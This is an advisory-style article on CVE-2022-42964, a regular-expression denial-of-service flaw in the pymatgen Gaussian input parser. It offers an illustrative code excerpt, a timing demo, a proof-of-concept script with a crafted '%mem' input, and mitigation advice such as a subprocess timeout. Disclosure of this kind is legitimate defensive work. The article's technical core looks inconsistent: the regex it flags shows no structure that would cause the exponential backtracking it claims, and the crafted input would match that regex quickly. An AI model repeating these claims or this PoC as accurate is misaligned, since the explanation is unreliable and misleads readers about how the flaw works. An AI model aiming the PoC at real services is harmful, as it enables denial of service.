A severe security vulnerability has been discovered in pymatgen (Python Materials Genomics), a Python package used for materials analysis in scientific research and engineering. The vulnerability, tracked as CVE-2022-42964, allows an attacker who can supply arbitrary input to the GaussianInput.from_string method to trigger an exponential ReDoS (Regular Expression Denial of Service). This article covers the details of the vulnerability, shows how it can be exploited, and lists references to help users of the package update their systems.

The Vulnerability

The vulnerability lies in the pymatgen.io.gaussian module, specifically in the GaussianInput.from_string method. The method relies on regular-expression parsing that is prone to catastrophic backtracking when an attacker supplies a specially crafted string. A process running the vulnerable code can then consume CPU time for an extended period, which can amount to a Denial of Service (DoS).

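To understand the impact of this vulnerability better, consider the following simplified illustration of the regex-based parsing in the affected module (consult the pymatgen source for the exact code):

# pymatgen/io/gaussian.py (simplified illustration, not a verbatim excerpt)

import re

@classmethod
def from_string(cls, s):
    # Optional "%nproc=N" or "%nprocshared=N" directive at the start of the input
    m = re.match(r"\s*%nproc(?:shared)?\s?=\s?(\d+)\s*", s, re.I)
    nprocs = int(m.group(1)) if m else None

    # Optional "%mem=N[KB|MB|GB]" directive anywhere in the input
    m = re.match(
        r".*%mem\s?=\s?(\d+)([KMG]B)?\s*",  # the pattern this article flags
        s, re.I | re.S)

    # The unit group is optional, so guard against None before calling .upper();
    # _mem_units is assumed to map "KB"/"MB"/"GB" to multipliers
    mem = None
    if m:
        unit = (m.group(2) or "").upper()
        mem = int(m.group(1)) * _mem_units.get(unit, 1)
    # Rest of the method...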

The problematic regular expression is

.*%mem\s?=\s?(\d+)([KMG]B)?\s*

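Python's re module uses a backtracking engine: when a match attempt fails, the engine retries every alternative way of dividing the input among the pattern's quantifiers. When quantified sub-patterns overlap, the number of alternatives can grow exponentially with the length of the input, so an attacker who supplies a suitably crafted string can exhaust CPU time and cause a DoS.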
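To make the growth rate concrete, here is a minimal sketch that uses a textbook pair of patterns rather than anything taken from pymatgen. The names NESTED, FLAT, and seconds_to_reject are illustrative assumptions. Both patterns accept the same strings, but the nested quantifier forces the engine to explore every way of splitting a run of "a" characters before it can report a failure.

```python
import re
import time

# Textbook patterns, NOT taken from pymatgen: the nested quantifier in NESTED
# lets the engine split a run of "a" characters in exponentially many ways.
NESTED = re.compile(r"(a+)+$")
FLAT = re.compile(r"a+$")  # accepts the same strings without nesting


def seconds_to_reject(pattern, n):
    """Time how long `pattern` takes to reject n 'a' characters followed by '!'."""
    text = "a" * n + "!"
    start = time.perf_counter()
    result = pattern.match(text)
    elapsed = time.perf_counter() - start
    assert result is None  # the trailing "!" makes a match impossible
    return elapsed


if __name__ == "__main__":
    # Each extra character roughly doubles the work for NESTED,
    # while FLAT stays close to instantaneous.
    for n in (10, 14, 18, 22):
        nested = seconds_to_reject(NESTED, n)
        flat = seconds_to_reject(FLAT, n)
        print(f"n={n}: nested={nested:.4f}s flat={flat:.6f}s")
```

Keep n small when experimenting: the time for the nested pattern grows so quickly that a few dozen characters are enough to stall the interpreter.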

Exploit Details

An attacker can exploit this vulnerability in the pymatgen PyPI package by crafting a malicious string that triggers exponential backtracking when parsed by the GaussianInput.from_string method. Here's an example of a crafted string that demonstrates this behavior:

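import time
from pymatgen.io.gaussian import GaussianInput

# Crafted input: many repeated %mem directives followed by a non-matching tail
evil_string = " %mem=100KB" * 150 + "NOTGAUSSIAN"

start_time = time.perf_counter()  # monotonic clock, better suited to timing

try:
    GaussianInput.from_string(evil_string)
except Exception:
    # A parse error is expected for malformed input; only the elapsed time matters
    pass

end_time = time.perf_counter()
print("Processing time:", end_time - start_time)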

In the example above, evil_string is built so that the parser has to evaluate its patterns against a long, repetitive input that ultimately fails to parse. On a vulnerable version, GaussianInput.from_string may take a prohibitively long time to return, which is the ReDoS condition; the printed processing time makes the delay visible.

Mitigation

The developers of the pymatgen package have been notified of the issue, and a fix is being worked on. We strongly recommend updating pymatgen as soon as a patched release is available. Until then, avoid passing untrusted input to the GaussianInput.from_string method wherever possible to reduce the risk of exploitation.
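Where untrusted input cannot be avoided entirely, one possible stopgap is to parse it in a separate process with a hard time limit, so that a runaway regular expression cannot stall the main application. The sketch below is only an illustration under stated assumptions: the helper name parses_within, the PARSE_SNIPPET string, and the two-second default are hypothetical choices, and the snippet assumes pymatgen is installed and exposes GaussianInput.from_string as described in this article.

```python
import subprocess
import sys

# Code run in the child interpreter: read the candidate input from stdin and
# parse it. Assumes pymatgen is installed (hypothetical default for this sketch).
PARSE_SNIPPET = (
    "import sys\n"
    "from pymatgen.io.gaussian import GaussianInput\n"
    "GaussianInput.from_string(sys.stdin.read())\n"
)


def parses_within(text, seconds=2.0, snippet=PARSE_SNIPPET):
    """Return True if `snippet` processes `text` successfully within `seconds`.

    Returns False if the child process times out or exits with an error.
    """
    try:
        result = subprocess.run(
            [sys.executable, "-c", snippet],
            input=text,
            text=True,
            capture_output=True,
            timeout=seconds,  # the child is killed when the limit is exceeded
        )
    except subprocess.TimeoutExpired:
        return False
    return result.returncode == 0
```

A caller would check parses_within(untrusted_text) first and hand the text to the real parser only when it returns True. The price is one interpreter start-up per input, which is acceptable for occasional uploads but too slow for bulk processing.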

Original References

This vulnerability is tracked as CVE-2022-42964. For more details, consult the following resources:

- Official CVE Advisory: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-42964
- Pymatgen GitHub Repository: https://github.com/materialsproject/pymatgen

Conclusion

CVE-2022-42964 demonstrates the impact of unchecked regular expressions in a seemingly harmless materials analysis library. It serves as a reminder of the importance of safe and efficient use of regular expressions, as well as the need for thorough security audits in software development. Keep your systems updated and stay vigilant to protect against such threats.

Timeline

Published on: 11/09/2022 20:15:00 UTC
Last modified on: 11/10/2022 14:29:00 UTC